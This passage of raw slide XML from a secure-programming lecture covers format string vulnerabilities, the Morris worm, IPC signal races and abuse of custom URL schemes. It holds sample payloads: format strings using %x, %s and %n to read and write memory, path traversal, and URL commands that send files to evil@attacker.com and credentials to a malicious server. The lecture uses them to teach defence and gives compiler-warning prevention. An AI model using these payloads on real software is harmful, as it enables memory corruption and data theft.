        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>printf(user_input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>user_input contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100"/>
              <a:t>"\x10\x01\x48\x08 %x %x %x %x %s"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1034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638425"/>
            <a:ext cx="5700713" cy="3814763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103429" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227763" y="3573463"/>
            <a:ext cx="2700337" cy="17446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cs-CZ" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>The key challenge in this attack </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>is to figure out the distance between </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>the user input[] and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>the address </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>passed to the printf() function. This </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>distance decides how many %x you</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>need to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>insert into the format string, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200"/>
              <a:t>before giving %s.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="120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37</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Write to memory</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>int i;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>printf ("12345%n", &amp;i);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Writes 5 to variable i</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Use similar approach as when reading but replace %s (reading) with %n (writing)</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" alt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38</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Format string – not only printf</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66564" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="2420938"/>
            <a:ext cx="5486400" cy="1749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a:t>/* receiving http packet */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>int size = recv(fd, pktBuf, sizeof(pktBuf), 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>if (size) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>syslog(LOG_INFO, "Received new HTTP request!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>syslog(LOG_INFO, pktBuf);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66565" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="735013" y="5032375"/>
            <a:ext cx="63754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a:t>"AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n"</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39</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Morris worm</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>November</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> 2 to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>November</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> 4, 1988</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Mostly Sun and VAX machines were hit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Approx. 10% of the 60,000 computers connected to the Internet were affected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Robert T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>. Morris was a son of the head of NCSA </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Robert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>T. Morris currently works </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> MIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>tenured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>proffesor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Source available at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: http://www.foo.be/docs-free/morris-worm/worm/</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="20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a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="765175"/>
            <a:ext cx="8229600" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Format string vulnerability - prevention</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105477" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="1557338"/>
            <a:ext cx="84963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sz="1000" b="1"/>
              <a:t>-Wformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t>Check calls to printf and scanf, etc., to make sure that the arguments supplied have types appropriate to the format string specified, and that the conversions specified in the format string make sense. This includes standard functions, and others specified by format attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1000"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t> in the printf, scanf, strftime and strfmon (an X/Open extension, not in the C standard) families (or other target-specific families). Since -Wformat also checks for null format arguments for several functions, -Wformat also implies -Wnonnull. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t>-Wformat is included in -Wall. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000" b="1"/>
              <a:t>-Wformat-y2k </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t>If -Wformat is specified, also warn about strftime formats which may yield only a two-digit year. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
            </a:br>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000" b="1"/>
              <a:t>-Wno-format-extra-args </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t>If -Wformat is specified, do not warn about excess arguments to a printf or scanf format function. The C standard specifies that such arguments are ignored. Where the unused arguments lie between used arguments that are specified with `$' operand number specifications, normally warnings are still given, since the implementation could not know what type to pass to va_arg to skip the unused arguments. However, in the case of scanf formats, this option will suppress the warning if the unused arguments are all pointers, since the Single Unix Specification says that such unused arguments are allowed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000" b="1"/>
              <a:t>-Wno-format-zero-length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t>If -Wformat is specified, do not warn about zero-length formats. The C standard specifies that zero-length formats are allowed. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
            </a:br>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000" b="1"/>
              <a:t>-Wformat-nonliteral </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t>If -Wformat is specified, also warn if the format string is not a string literal and so cannot be checked, unless the format function takes its format arguments as a va_list. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
            </a:br>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000" b="1"/>
              <a:t>-Wformat-security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t>If -Wformat is specified, also warn about uses of format functions that represent possible security problems. At present, this warns about calls to printf and scanf functions where the format string is not a string literal and there are no format arguments, as in printf (foo);. This may be a security hole if the format string came from untrusted input and contains `%n'. (This is currently a subset of what -Wformat-nonliteral warns about, but in future warnings may be added to -Wformat-security that are not included in -Wformat-nonliteral.) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
            </a:br>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000" b="1"/>
              <a:t>-Wformat=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1000"/>
              <a:t>Enable -Wformat plus format checks not included in -Wformat. Currently equivalent to `-Wformat -Wformat-nonliteral -Wformat-security -Wformat-y2k'. </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40</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>URL and Files/Emails</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1871663"/>
            <a:ext cx="8713788" cy="4149725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>myapp://cmd/run?program=/path/to/program/to/run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>myapp://cmd/set_preference?use_ssl=false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>myapp://cmd/sendfile?to=evil@attacker.com&amp;file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>myapp://cmd/delete?data_to_delete=my_document_ive_been_working_on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t>myapp://cmd/login_to?server_to_send_credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>some.malicious.webserver.com</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="28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41</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>URL: File names</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68612" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="2116138"/>
            <a:ext cx="777557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a:t>myapp://use_template?template=/../../../../../../../../some/other/file</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Obdélník 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="3244334"/>
            <a:ext cx="7775575" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Be aware of files and directory permissions  or access control.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ"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a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>What can be input?</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>From users (user interface)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>From files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Over the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>From other processes (IPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Environment variables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>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43</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>IPC</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Shared memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Signals (asynchronous notifications)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>“In 2004, a signal handler race condition was found in open-source code present in many UNIX-based operating systems. This bug made it possible for a remote attacker to execute arbitrary code or to stop the FTP daemon from working by causing it to read data from a socket and execute commands while it was still running as the root user. [CVE-2004-0794]”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="900" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="900" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Read more at: http://www.frasunek.com/lukemftpd.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
